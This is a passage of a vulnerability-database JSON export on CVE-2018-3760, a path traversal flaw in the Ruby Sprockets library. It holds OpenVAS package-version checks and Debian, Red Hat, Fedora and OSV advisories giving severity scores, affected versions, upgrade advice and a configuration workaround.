rpm:\"ruby2.2-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-rubygem-sprockets-doc\", rpm:\"ruby2.2-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-rubygem-sprockets\", rpm:\"ruby2.3-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-rubygem-sprockets-doc\", rpm:\"ruby2.3-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.4-rubygem-sprockets\", rpm:\"ruby2.4-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.4-rubygem-sprockets-doc\", rpm:\"ruby2.4-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-15T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-sprockets FEDORA-2018-fd29597fa4", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874818", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874818", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_fd29597fa4_rubygem-sprockets_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for rubygem-sprockets FEDORA-2018-fd29597fa4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874818\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-15 06:08:09 +0200 (Sun, 15 Jul 2018)\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-sprockets FEDORA-2018-fd29597fa4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-sprockets on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-fd29597fa4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GMQYHKVRTMDCFD5ESASU4JA5K27JQ3NK\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-sprockets\", rpm:\"rubygem-sprockets~3.7.2~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:07:22", "description": "It was discovered that there was a discovered a path traversal flaw\nin ruby-sprockets, a Rack-based asset packaging system. A remote\nattacker could take advantage of this flaw to read arbitrary files\noutside an application", "cvss3": {}, "published": "2018-07-16T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for ruby-sprockets (DLA-1419-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891419", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891419", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891419\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_name(\"Debian LTS: Security Advisory for ruby-sprockets (DLA-1419-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-16 00:00:00 +0200 (Mon, 16 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00010.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"ruby-sprockets on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this issue has been fixed in ruby-sprockets version\n2.12.3-1+deb8u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\");\n\n script_tag(name:\"summary\", value:\"It was discovered that there was a discovered a path traversal flaw\nin ruby-sprockets, a Rack-based asset packaging system. A remote\nattacker could take advantage of this flaw to read arbitrary files\noutside an application's root directory via 'file://' requests.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-sprockets\", ver:\"2.12.3-1+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-05-18T05:38:26", "description": "Specially crafted requests can be used to access files that exist on the filesystem that is outside an application's root directory, when the Sprockets server is used in production.\n \nAll users running an affected release should either upgrade or use one of the work arounds immediately.\n \nWorkaround:\n \nIn Rails applications, work around this issue, set `config.assets.compile = false` and `config.public_file_server.enabled = true` in an initializer and precompile the assets.\n\nThis work around will not be possible in all hosting environments and upgrading is advised.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-20T22:18:58", "type": "osv", "title": "High severity vulnerability that affects sprockets", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2022-05-18T04:15:29", "id": "OSV:GHSA-PR3H-JJHJ-573X", "href": "https://osv.dev/vulnerability/GHSA-pr3h-jjhj-573x", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2022-05-18T16:12:50", "description": "There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the work arounds immediately.\n#### Mitigation\n\nEnsure config.assets.compile = false in production.rb. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-10-09T16:26:49", "type": "redhatcve", "title": "CVE-2018-3760", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2022-05-18T15:29:36", "id": "RH:CVE-2018-3760", "href": "https://access.redhat.com/security/cve/cve-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2021-10-21T18:35:01", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4242-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 09, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby-sprockets\nCVE ID : CVE-2018-3760\nDebian Bug : 901913\n\nOrange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application&#x27;s root\ndirectory via specially crafted requests, when the Sprockets server is\nused in production.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\n\nFor the detailed security status of ruby-sprockets please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ruby-sprockets\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T21:06:50", "type": "debian", "title": "[SECURITY] [DSA 4242-1] ruby-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-09T21:06:50", "id": "DEBIAN:DSA-4242-1:A62DA", "href": "https://lists.debian.org/debian-security-announce/2018/msg00171.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-03T03:52:31", "description": "Package : ruby-sprockets\nVersion : 2.12.3-1+deb8u1\nCVE IDs : CVE-2018-3760 \nDebian Bug : #901913\n\nIt was discovered that there was a discovered a path traversal flaw\nin ruby-sprockets, a Rack-based asset packaging system. A remote\nattacker could take advantage of this flaw to read arbitrary files\noutside an application&#x27;s root directory via &quot;file://&quot; requests.\n\nFor Debian 8 &quot;Jessie&quot;, this issue has been fixed in ruby-sprockets version\n2.12.3-1+deb8u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\n\n\nRegards,\n\n- -- \n ,&#x27;&#x27;`.\n : :&#x27; : Chris Lamb\n `. `&#x27;` lamby@debian.org / chris-lamb.co.uk\n `-", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-12T09:30:56", "type": "debian", "title": "[SECURITY] [DLA-1419-1] ruby-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-12T09:30:56", "id": "DEBIAN:DLA-1419-1:7C53E", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00010.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T23:51:08", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4242-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 09, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby-sprockets\nCVE ID : CVE-2018-3760\nDebian Bug : 901913\n\nOrange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application&#x27;s root\ndirectory via specially crafted requests, when the Sprockets server is\nused in production.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\n\nFor the detailed security status of ruby-sprockets please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ruby-sprockets\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T21:06:50", "type": "debian", "title": "[SECURITY] [DSA 4242-1] ruby-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-09T21:06:50", "id": "DEBIAN:DSA-4242-1:C27C6", "href": "https://lists.debian.org/debian-security-announce/2018/msg00171.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2021-10-19T20:38:39", "description": "Sprockets is a Ruby library for compiling and serving web assets. It features declarative dependency management for JavaScript and CSS assets, as well as a powerful preprocessor pipeline that allows to write assets in languages like CoffeeScript, Sass and SCSS.\n\nSecurity Fix(es):\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-24T07:16:12", "type": "redhat", "title": "(RHSA-2018:2245) Important: rh-ror50-rubygem-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-24T07:18:39", "id": "RHSA-2018:2245", "href": "https://access.redhat.com/errata/RHSA-2018:2245", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:36:12", "description": "Sprockets is a Ruby library for compiling and serving web assets. It features declarative dependency management for JavaScript and CSS assets, as well as a powerful preprocessor pipeline that allows to write assets in languages like CoffeeScript, Sass and SCSS.\n\nSecurity Fix(es):\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-24T07:16:08", "type": "redhat", "title": "(RHSA-2018:2244) Important: rh-ror42-rubygem-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-24T07:18:37", "id": "RHSA-2018:2244", "href": "https://access.redhat.com/errata/RHSA-2018:2244", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:38:13", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development.\n\nSecurity Fix(es):\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\n* cfme: Improper access control in dRuby allows local users to execute arbitrary commands as root (CVE-2018-10905)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Stephen Gappinger (American Express) for reporting CVE-2018-10905.\n\nAdditional Changes:\n\nThis update fixes various bugs and adds enhancements. Documentation for these changes is available from the Release Notes document.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-26T18:25:56", "type": "redhat", "title": "(RHSA-2018:2745) Important: CloudForms 4.5.5 security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10905", "CVE-2018-3760"], "modified": "2018-09-26T18:26:57", "id": "RHSA-2018:2745", "href": "https://access.redhat.com/errata/RHSA-2018:2745", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:38:58", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* cfme: Improper access control in dRuby allows local users to execute arbitrary commands as root (CVE-2018-10905)\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Stephen Gappinger (American Express) for reporting CVE-2018-10905.\n\nAdditional Changes:\n\nThis update fixes various bugs and adds enhancements. Documentation for these changes is available from the Release Notes document.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-04T17:51:21", "type": "redhat", "title": "(RHSA-2018:2561) Important: CloudForms 4.6.4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10905", "CVE-2018-3760"], "modified": "2018-09-04T17:52:37", "id": "RHSA-2018:2561", "href": "https://access.redhat.com/errata/RHSA-2018:2561", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Sprockets is a Rack-based asset packaging system that concatenates and serv es JavaScript, CoffeeScript, CSS, LESS, Sass, and SCSS. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-15T03:33:48", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: rubygem-sprockets-3.7.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-15T03:33:48", "id": "FEDORA:2E73F65F395E", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Sprockets is a Rack-based asset packaging system that concatenates and serv es JavaScript, CoffeeScript, CSS, LESS, Sass, and SCSS. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-14T23:36:29", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: rubygem-sprockets-3.7.2-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 